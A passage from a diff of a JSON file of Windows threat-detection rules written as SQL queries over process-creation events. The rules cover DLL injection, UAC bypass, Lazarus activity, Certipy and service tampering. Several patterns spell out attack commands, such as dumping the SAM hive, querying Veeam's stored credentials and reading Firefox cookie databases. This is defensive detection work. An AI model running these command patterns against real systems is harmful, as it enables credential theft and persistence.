This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.", - "author": "Victor Sergeev, oscd.community", + "title": "Mavinject Inject DLL Into Running Process", + "id": "4f73421b-5a0b-4bbf-a892-5a7fb99bea66", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "author": "frack113, Florian Roth", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.007", - "attack.s0108" + "attack.t1055.001", + "attack.t1218.013" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%helper%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '% /INJECTRUNNING %' ESCAPE '\\' AND NOT (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\AppVClient.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_netsh_helper_dll_persistence.yml" + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml" }, { - "title": "HackTool - TruffleSnout Execution", - "id": "69ca006d-b9a9-47f5-80ff-ecd4d25d481a", + "title": "Potential Renamed Rundll32 Execution", + "id": "2569ed8c-1147-498a-9b8c-2ad3656b10ed", "status": "experimental", - "description": "Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.", - "author": "frack113", + "description": "Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. 
This could mean that the 'rundll32' utility has been renamed in order to avoid detection", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1482" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'TruffleSnout.exe' OR NewProcessName LIKE '%\\\\TruffleSnout.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%DllRegisterServer%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_trufflesnout.yml" + "filename": "proc_creation_win_renamed_rundll32_dllregisterserver.yml" }, { - "title": "Suspicious Shells Spawn by SQL Server", - "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "title": "Suspicious Key Manager Access", + "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", "status": "experimental", - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "author": "FPT.EagleEye Team, wagga", + "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.credential_access", + "attack.t1555.004" + ], + "falsepositives": [ + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mssql_susp_child_process.yml" + "filename": "proc_creation_win_rundll32_keymgr.yml" }, { - "title": "Suspicious Schtasks Execution AppData Folder", - "id": "c5c00f49-b3f9-45a6-997e-cfdecc6e1967", - "status": "experimental", - "description": "Detects the creation of a schtask that executes a file from C:\\Users\\\\AppData\\Local", - "author": "pH-T (Nextron Systems), Nasreddine Bencherchali", + "title": "Exploit for CVE-2015-1641", + "id": "7993792c-5ce2-4475-a3db-a3a5539827ef", + "status": "stable", + "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/TR%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\MicroScMgmt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_schtasks_appdata_local_system.yml" + "filename": "proc_creation_win_exploit_cve_2015_1641.yml" }, { - "title": "HackTool - SharpChisel Execution", - "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", - "status": "experimental", - "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "title": "New User Created Via Net.EXE With Never Expire Option", + "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "status": "test", + "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_sharp_chisel.yml" + "filename": 
"proc_creation_win_net_user_add_never_expire.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", - "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Lazarus Group Activity", + "id": "24c4d154-05a4-4b99-b57d-9b977472443a", + "status": "test", + "description": "Detects different process execution behaviors as described in various threat reports on Lazarus group activity", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.g0032", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg.exe save hklm\\\\sam \\%temp\\%\\\\~reg\\_sam.save%' ESCAPE '\\' OR CommandLine LIKE '%1q2w3e4r@#$@#$@#$%' ESCAPE '\\' OR CommandLine LIKE '% -hp1q2w3e4 %' ESCAPE '\\' OR CommandLine LIKE '%.dat data03 10000 -p %' ESCAPE '\\') OR (CommandLine LIKE '%netstat -aon | find %' ESCAPE '\\' AND CommandLine LIKE '%ESTA%' ESCAPE '\\' AND CommandLine LIKE '% > \\%temp\\%\\\\~%' ESCAPE '\\') OR (CommandLine LIKE '%.255 10 C:\\\\ProgramData\\\\IBM\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.DAT%' ESCAPE '\\') OR (CommandLine LIKE '% /c %' ESCAPE 
'\\' AND CommandLine LIKE '% -p 0x%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\RECYCLER\\\\%' ESCAPE '\\')) OR (CommandLine LIKE '%rundll32 %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.bin,%' ESCAPE '\\' OR CommandLine LIKE '%.tmp,%' ESCAPE '\\' OR CommandLine LIKE '%.dat,%' ESCAPE '\\' OR CommandLine LIKE '%.io,%' ESCAPE '\\' OR CommandLine LIKE '%.ini,%' ESCAPE '\\' OR CommandLine LIKE '%.db,%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" + "filename": "proc_creation_win_apt_lazarus_group_activity.yml" }, { - "title": "Renamed SysInternals DebugView Execution", - "id": "cd764533-2e07-40d6-a718-cfeec7f2da7f", + "title": "VeeamBackup Database Credentials Dump Via Sqlcmd.EXE", + "id": "b57ba453-b384-4ab9-9f40-1038086b4e53", "status": "test", - "description": "Detects suspicious renamed SysInternals DebugView execution", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects dump of credentials in VeeamBackup dbo", + "author": "frack113", "tags": [ - "attack.resource_development", - "attack.t1588.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Sysinternals DebugView' AND NOT (OriginalFileName = 'Dbgview.exe' AND NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' AND CommandLine LIKE '%SELECT%' ESCAPE '\\' AND CommandLine LIKE '%TOP%' ESCAPE '\\' AND CommandLine LIKE '%[VeeamBackup].[dbo].[Credentials]%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_sysinternals_debugview.yml" + "filename": "proc_creation_win_sqlcmd_veeam_dump.yml" }, { - "title": "PUA - Process Hacker / System Informer Execution", - "id": 
"811e0002-b13b-4a15-9d00-a613fce66e42", - "status": "experimental", - "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Sometimes used by developers or system administrators for debugging purposes" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + "title": "UAC Bypass Using NTFS Reparse Point - Process", + 
"id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", + "status": "test", + "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], - "filename": "proc_creation_win_pua_process_hacker.yml" - }, - { - "title": "Rundll32 Execution Without DLL File", - "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", - "status": "experimental", - "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", - "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program 
Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\wusa.exe\" /quiet C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\update.msu' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\\\Windows\\\\system32\\\\pe386\" /ignorecheck' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\DismHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" + "filename": "proc_creation_win_uac_bypass_ntfs_reparse_point.yml" }, { - "title": "UAC Bypass Abusing Winsat Path Parsing - Process", - "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", - "author": "Christian Burkard (Nextron Systems)", + 
"title": "HackTool - Certipy Execution", + "id": "6938366d-8954-4ddc-baff-c830b3ba8fcd", + "status": "experimental", + "description": "Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.credential_access", + "attack.t1649" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Certipy.exe' ESCAPE '\\' OR OriginalFileName = 'Certipy.exe' OR Description LIKE '%Certipy%' ESCAPE '\\') OR ((CommandLine LIKE '% auth %' ESCAPE '\\' OR CommandLine LIKE '% find %' ESCAPE '\\' OR CommandLine LIKE '% forge %' ESCAPE '\\' OR CommandLine LIKE '% relay %' ESCAPE '\\' OR CommandLine LIKE '% req %' ESCAPE '\\' OR CommandLine LIKE '% shadow %' ESCAPE '\\') AND (CommandLine LIKE '% -bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -ca-pfx %' ESCAPE '\\' OR CommandLine LIKE '% -dc-ip %' ESCAPE '\\' OR CommandLine LIKE '% -kirbi%' ESCAPE '\\' OR CommandLine LIKE '% -old-bloodhound%' ESCAPE '\\' OR CommandLine LIKE '% -pfx %' ESCAPE '\\' OR CommandLine LIKE '% -target%' ESCAPE '\\' OR CommandLine LIKE '% -username %' ESCAPE '\\' OR CommandLine LIKE '% -vulnerable%' ESCAPE '\\' OR CommandLine LIKE '%auth -pfx%' ESCAPE '\\' OR CommandLine LIKE '%shadow auto%' ESCAPE '\\' OR CommandLine LIKE '%shadow list%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_uac_bypass_winsat.yml" + "filename": 
"proc_creation_win_hktl_certipy.yml" }, { - "title": "SQLite Firefox Profile Data DB Access", - "id": "4833155a-4053-4c9c-a997-777fcea0baa7", + "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet", + "id": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", "status": "experimental", - "description": "Detect usage of the \"sqlite\" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing.", - "author": "frack113", + "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1539", - "attack.collection", - "attack.t1005" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'SQLite' OR (NewProcessName LIKE '%\\\\sqlite.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlite3.exe' ESCAPE '\\')) AND (CommandLine LIKE '%cookies.sqlite%' ESCAPE '\\' OR CommandLine LIKE '%places.sqlite%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%D;;%' ESCAPE '\\' AND (CommandLine LIKE '%;;;IU%' ESCAPE '\\' OR CommandLine LIKE '%;;;SU%' ESCAPE '\\' OR CommandLine LIKE '%;;;BA%' ESCAPE '\\' OR CommandLine LIKE '%;;;SY%' ESCAPE '\\' OR CommandLine LIKE '%;;;WD%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sqlite_firefox_gecko_profile_data.yml" + "filename": "proc_creation_win_powershell_service_dacl_modification_set_service.yml" }, 
{ - "title": "OpenWith.exe Executes Specified Binary", - "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", - "status": "test", - "description": "The OpenWith.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "title": "Suspicious Windows Service Tampering", + "id": "ce72ef99-22f1-43d4-8695-419dcb5d9330", + "status": "experimental", + "description": "Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1489" ], "falsepositives": [ - "Unknown" + "Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\OpenWith.exe' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%143Svc%' ESCAPE '\\' OR CommandLine LIKE '%Acronis VSS Provider%' ESCAPE '\\' OR CommandLine LIKE '%AcronisAgent%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%ARSM%' ESCAPE '\\' OR CommandLine LIKE '%aswBcc%' ESCAPE '\\' OR CommandLine LIKE '%Avast Business Console Client Antivirus Service%' ESCAPE '\\' OR CommandLine LIKE '%avast! 
Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%avgAdminClient%' ESCAPE '\\' OR CommandLine LIKE '%AvgAdminServer%' ESCAPE '\\' OR CommandLine LIKE '%AVP1%' ESCAPE '\\' OR CommandLine LIKE '%BackupExec%' ESCAPE '\\' OR CommandLine LIKE '%bedbg%' ESCAPE '\\' OR CommandLine LIKE '%BITS%' ESCAPE '\\' OR CommandLine LIKE '%BrokerInfrastructure%' ESCAPE '\\' OR CommandLine LIKE '%Client Agent 7.60%' ESCAPE '\\' OR CommandLine LIKE '%Core Browsing Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Mail Protection%' ESCAPE '\\' OR CommandLine LIKE '%Core Scanning Server%' ESCAPE '\\' OR CommandLine LIKE '%DCAgent%' ESCAPE '\\' OR CommandLine LIKE '%EhttpSr%' ESCAPE '\\' OR CommandLine LIKE '%ekrn%' ESCAPE '\\' OR CommandLine LIKE '%Enterprise Client Service%' ESCAPE '\\' OR CommandLine LIKE '%epag%' ESCAPE '\\' OR CommandLine LIKE '%EPIntegrationService%' ESCAPE '\\' OR CommandLine LIKE '%EPProtectedService%' ESCAPE '\\' OR CommandLine LIKE '%EPRedline%' ESCAPE '\\' OR CommandLine LIKE '%EPSecurityService%' ESCAPE '\\' OR CommandLine LIKE '%EPUpdateService%' ESCAPE '\\' OR CommandLine LIKE '%EraserSvc11710%' ESCAPE '\\' OR CommandLine LIKE '%EsgShKernel%' ESCAPE '\\' OR CommandLine LIKE '%ESHASRV%' ESCAPE '\\' OR CommandLine LIKE '%FA\\_Scheduler%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdGuardianDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%FirebirdServerDefaultInstance%' ESCAPE '\\' OR CommandLine LIKE '%HealthTLService%' ESCAPE '\\' OR CommandLine LIKE '%HISSQLFDLauncherSSHAREPOINIT%' ESCAPE '\\' OR CommandLine LIKE '%hmpalertsvc%' ESCAPE '\\' OR CommandLine LIKE '%HMS%' ESCAPE '\\' OR CommandLine LIKE '%IISAdmin%' ESCAPE '\\' OR CommandLine LIKE '%IMANSVC%' ESCAPE '\\' OR CommandLine LIKE '%IMAP4Svc%' ESCAPE '\\' OR CommandLine LIKE '%KAVFS%' ESCAPE '\\' OR CommandLine LIKE '%KAVFSGT%' ESCAPE '\\' OR CommandLine LIKE '%kavfsslp%' ESCAPE '\\' OR CommandLine LIKE '%klbackupdisk%' ESCAPE '\\' OR CommandLine LIKE 
'%klbackupflt%' ESCAPE '\\' OR CommandLine LIKE '%klflt%' ESCAPE '\\' OR CommandLine LIKE '%klhk%' ESCAPE '\\' OR CommandLine LIKE '%KLIF%' ESCAPE '\\' OR CommandLine LIKE '%klim6%' ESCAPE '\\' OR CommandLine LIKE '%klkbdflt%' ESCAPE '\\' OR CommandLine LIKE '%klmouflt%' ESCAPE '\\' OR CommandLine LIKE '%klnagent%' ESCAPE '\\' OR CommandLine LIKE '%klpd%' ESCAPE '\\' OR CommandLine LIKE '%kltap%' ESCAPE '\\' OR CommandLine LIKE '%KSDE1.0.0%' ESCAPE '\\' OR CommandLine LIKE '%LogProcessorService%' ESCAPE '\\' OR CommandLine LIKE '%M8EndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%macmnsvc%' ESCAPE '\\' OR CommandLine LIKE '%masvc%' ESCAPE '\\' OR CommandLine LIKE '%MBAMService%' ESCAPE '\\' OR CommandLine LIKE '%MBCloudEA%' ESCAPE '\\' OR CommandLine LIKE '%MBEndpointAgent%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeDLPAgentService%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeEngineService%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEEEVENTPARSERSRV%' ESCAPE '\\' OR CommandLine LIKE '%McAfeeFramework%' ESCAPE '\\' OR CommandLine LIKE '%MCAFEETOMCATSRV530%' ESCAPE '\\' OR CommandLine LIKE '%McShield%' ESCAPE '\\' OR CommandLine LIKE '%McTaskManager%' ESCAPE '\\' OR CommandLine LIKE '%mfefire%' ESCAPE '\\' OR CommandLine LIKE '%mfemms%' ESCAPE '\\' OR CommandLine LIKE '%mfevto%' ESCAPE '\\' OR CommandLine LIKE '%mfevtp%' ESCAPE '\\' OR CommandLine LIKE '%mfewc%' ESCAPE '\\' OR CommandLine LIKE '%MMS%' ESCAPE '\\' OR CommandLine LIKE '%mozyprobackup%' ESCAPE '\\' OR CommandLine LIKE '%MsDtsServer%' ESCAPE 